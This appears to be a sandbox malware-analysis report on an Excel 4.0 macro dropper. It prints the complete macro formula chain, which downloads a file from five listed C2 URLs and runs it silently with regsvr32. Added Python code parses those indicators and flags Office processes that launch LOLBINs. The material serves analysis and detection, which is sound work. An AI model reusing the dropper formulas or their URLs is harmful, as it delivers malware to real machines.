General

  • Target

    8785f8a97162333ca6c2daff37af851ba813c1f5e93550a9702c23dfe1a0ae17

  • Size

    90KB

  • Sample

    241120-wwjxha1fnl

  • MD5

    79bca6a455b1291a4a4ab52e9e3599de

  • SHA1

    ee0891d5a6786f735c219ebf66f414c6fe7a226c

  • SHA256

    8785f8a97162333ca6c2daff37af851ba813c1f5e93550a9702c23dfe1a0ae17

  • SHA512

    7722cb0c1a1402ae827eb91606d697c8dbcc42cdafd4d6c44a3a679ba633d830c7bff2f3a0fb256f02948c8f8f50557c17eeab04fb0c2a3feef62fae560e3691

  • SSDEEP

    1536:vQBrnXpnyV+ns1BVi/IEh2hx0Lx3bKhllGGx0vKCEjdQjqEk+xXPd:GDpyVEoBo6hKb4llGsQjbxfd

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://www.ajaxmatters.com/c7g8t/zbBYgukXYxzAF2hZc/

http://www.beholdpublications.com/home/BABxyyWZx8Vu/

http://explorationit.com/screwing/AxLm/

http://donboscoschoolputhuppally.org/wp-content/UuQ7LBsPoGu9Q/

http://myclassroomtime.com/mongery/ZlPsROtQiXIujmJmAA/

Attributes
  • formulas

    =FORMULA()
    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ajaxmatters.com/c7g8t/zbBYgukXYxzAF2hZc/","..\xxw1.ocx",0,0)
    =IF('EGFAGAGDGE'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.beholdpublications.com/home/BABxyyWZx8Vu/","..\xxw1.ocx",0,0))
    =IF('EGFAGAGDGE'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://explorationit.com/screwing/AxLm/","..\xxw1.ocx",0,0))
    =IF('EGFAGAGDGE'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://donboscoschoolputhuppally.org/wp-content/UuQ7LBsPoGu9Q/","..\xxw1.ocx",0,0))
    =IF('EGFAGAGDGE'!D21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://myclassroomtime.com/mongery/ZlPsROtQiXIujmJmAA/","..\xxw1.ocx",0,0))
    =IF('EGFAGAGDGE'!D23<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx")
    =RETURN()
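The formula chain above is the whole dropper: one unconditional URLDownloadToFileA call, four fallbacks that each fire only when the guard cell is negative (a failing HRESULT from the previous CALL, whose "J" return type is a signed 32-bit integer), a CLOSE(0) when every download failed, and an EXEC that registers the dropped file with regsvr32. The following parser pulls those indicators out of the formula text. It is an added example, not tooling from the sandbox vendor: the formula text is copied from the report, while the function names, the Download and MacroChain types, and the reading of each IF() guard as "retry with the next URL when the previous download failed" are assumptions of this example (the page does not say which cell holds which CALL result, so only the cell each guard reads is recorded).

```python
"""Parse an Excel 4.0 (XLM) macro chain like the one in the report's
"formulas" attribute and pull out its indicators.

Added example, not code from the sandbox vendor. FORMULAS is copied from
the report; everything else (names, types, the reading of IF() guards as
"previous download failed") is an assumption of this example.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Copied from the report. Raw string: a normal literal would treat "\x" in
# "..\xxw1.ocx" as a hex escape.
FORMULAS = r"""
=FORMULA()
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ajaxmatters.com/c7g8t/zbBYgukXYxzAF2hZc/","..\xxw1.ocx",0,0)
=IF('EGFAGAGDGE'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.beholdpublications.com/home/BABxyyWZx8Vu/","..\xxw1.ocx",0,0))
=IF('EGFAGAGDGE'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://explorationit.com/screwing/AxLm/","..\xxw1.ocx",0,0))
=IF('EGFAGAGDGE'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://donboscoschoolputhuppally.org/wp-content/UuQ7LBsPoGu9Q/","..\xxw1.ocx",0,0))
=IF('EGFAGAGDGE'!D21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://myclassroomtime.com/mongery/ZlPsROtQiXIujmJmAA/","..\xxw1.ocx",0,0))
=IF('EGFAGAGDGE'!D23<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx")
=RETURN()
"""

# CALL("urlmon","URLDownloadToFileA",<types>,0,<url>,<dest>,0,0). The leading
# "J" in the type string is the return type: a signed 32-bit int, the HRESULT.
CALL_RE = re.compile(
    r'CALL\("urlmon","URLDownloadToFileA","(?P<types>[A-Z]+)",0,'
    r'"(?P<url>[^"]+)","(?P<dest>[^"]+)",0,0\)'
)
IF_RE = re.compile(r"^=IF\('(?P<sheet>[^']+)'!(?P<cell>[A-Z]+[0-9]+)<0,(?P<body>.*)\)$")
EXEC_RE = re.compile(r'^=EXEC\("(?P<cmd>[^"]+)"\)$')


@dataclass
class Download:
    url: str
    dest: str
    guard: Optional[Tuple[str, str]]  # (sheet, cell) that must be < 0; None = unconditional


@dataclass
class MacroChain:
    downloads: List[Download]
    close_guard: Optional[Tuple[str, str]]  # CLOSE(0) fires when this cell is < 0
    exec_cmd: Optional[str]


def split_formulas(chain: str) -> List[str]:
    """One formula per element; formulas start with '=' and are whitespace separated."""
    return [f for f in re.split(r"\s+(?==)", chain.strip()) if f]


def parse_chain(chain: str) -> MacroChain:
    downloads: List[Download] = []
    close_guard = None
    exec_cmd = None
    for formula in split_formulas(chain):
        guard = None
        body = formula
        m = IF_RE.match(formula)
        if m:
            guard = (m["sheet"], m["cell"])
            body = m["body"]
            if body.startswith("CLOSE("):
                close_guard = guard
                continue
        c = CALL_RE.search(body)
        if c:
            downloads.append(Download(c["url"], c["dest"], guard))
            continue
        e = EXEC_RE.match(formula)
        if e:
            exec_cmd = e["cmd"]
    return MacroChain(downloads, close_guard, exec_cmd)


def iocs(chain: str) -> Dict[str, object]:
    parsed = parse_chain(chain)
    dropped = sorted({d.dest for d in parsed.downloads})
    cmd = parsed.exec_cmd or ""
    return {
        "urls": [d.url for d in parsed.downloads],
        "dropped": dropped,
        "command": cmd,
        # EXEC runs the file the downloads wrote: same second stage whichever URL answered
        "executes_dropped_file": any(d in cmd for d in dropped),
    }


def describe(chain: str) -> List[str]:
    """Execution order in plain words, for an analyst note."""
    parsed = parse_chain(chain)
    lines = []
    for i, d in enumerate(parsed.downloads, 1):
        when = "always" if d.guard is None else f"if {d.guard[0]}!{d.guard[1]} < 0 (previous download failed)"
        lines.append(f"{i}. {when}: download {d.url} -> {d.dest}")
    if parsed.close_guard:
        lines.append(f"close workbook if {parsed.close_guard[0]}!{parsed.close_guard[1]} < 0 (all downloads failed)")
    if parsed.exec_cmd:
        lines.append(f"run: {parsed.exec_cmd}")
    return lines


if __name__ == "__main__":
    print("\n".join(describe(FORMULAS)))
    print(iocs(FORMULAS))
```

All five URLs write the same relative path, so blocking one domain does not stop the chain; the drop path and the regsvr32 command line are the stable indicators.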

Extracted

Language
xlm4.0
Source
xlm40.dropper
URLs

http://www.ajaxmatters.com/c7g8t/zbBYgukXYxzAF2hZc/

Targets

    • Target

      8785f8a97162333ca6c2daff37af851ba813c1f5e93550a9702c23dfe1a0ae17

    • Size

      90KB

    • MD5

      79bca6a455b1291a4a4ab52e9e3599de

    • SHA1

      ee0891d5a6786f735c219ebf66f414c6fe7a226c

    • SHA256

      8785f8a97162333ca6c2daff37af851ba813c1f5e93550a9702c23dfe1a0ae17

    • SHA512

      7722cb0c1a1402ae827eb91606d697c8dbcc42cdafd4d6c44a3a679ba633d830c7bff2f3a0fb256f02948c8f8f50557c17eeab04fb0c2a3feef62fae560e3691

    • SSDEEP

      1536:vQBrnXpnyV+ns1BVi/IEh2hx0Lx3bKhllGGx0vKCEjdQjqEk+xXPd:GDpyVEoBo6hKb4llGsQjbxfd

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro. Here the macro's =EXEC() step runs C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx, so Excel spawns regsvr32.exe, which loads the downloaded file to register it.
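A host-side check for the behaviour this signature describes, as an added example (not the sandbox's own signature logic): an Office parent launching a living-off-the-land binary, scored by the command-line traits this sample shows (relative path, silent /s, a COM module outside the Windows directory). The events are constructed in the shape of Sysmon Event ID 1 (ProcessCreate) records; only the regsvr32 command line and drop path come from the report, and the image paths, user name and the other three events are made up for the example. The rule generalises beyond Excel and regsvr32 to the other Office parents and LOLBINs listed.

```python
"""Detect an Office process spawning a LOLBIN, as in the report's
Excel -> regsvr32.exe /s ..\\xxw1.ocx step.

Added example, not the sandbox's signature. Events are constructed
Sysmon EID 1 style records; only the regsvr32 command line is from the report.
"""
import ntpath
from dataclasses import dataclass
from typing import Dict, List, Optional

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe", "cscript.exe",
           "powershell.exe", "cmd.exe", "certutil.exe"}

# Constructed events. EVENTS[0] is the report's =EXEC() step as Sysmon would log it.
EVENTS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "CommandLine": r"C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"ParentImage": r"C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\SysWOW64\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\a.dll,DllRegisterServer"},
    {"ParentImage": r"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
]


@dataclass
class Finding:
    parent: str
    child: str
    command_line: str
    reasons: List[str]


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def evaluate(event: Dict[str, str]) -> Optional[Finding]:
    """Return a Finding when an Office parent launches a LOLBIN, listing the
    command-line traits that make this instance look like a dropper."""
    parent, child = _basename(event["ParentImage"]), _basename(event["Image"])
    if parent not in OFFICE_PARENTS or child not in LOLBINS:
        return None
    cmd = event.get("CommandLine", "")
    # Plain split is enough here: the constructed lines have no quoted paths with spaces.
    args = cmd.split()[1:]
    reasons = [f"{parent} spawned {child}"]
    if any(a.startswith(("..\\", ".\\")) for a in args):
        reasons.append("relative path argument")  # module dropped next to the workbook
    if child == "regsvr32.exe" and "/s" in (a.lower() for a in args):
        reasons.append("silent registration (/s)")
    for a in args:
        module = a.split(",", 1)[0]  # strip rundll32's ",Export" suffix
        if module.lower().endswith((".ocx", ".dll")) and not module.lower().startswith("c:\\windows\\"):
            reasons.append(f"module outside Windows directory: {module}")
            break
    return Finding(parent, child, cmd, reasons)


def scan(events: List[Dict[str, str]]) -> List[Finding]:
    return [f for f in map(evaluate, events) if f]


if __name__ == "__main__":
    for f in scan(EVENTS):
        print(f.parent, "->", f.child, "|", "; ".join(f.reasons))
```

The Excel to splwow64.exe event is left alone on purpose: Office legitimately spawns a few helpers, so the parent/child pair is only the entry condition and the command-line traits carry the confidence.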

MITRE ATT&CK Enterprise v15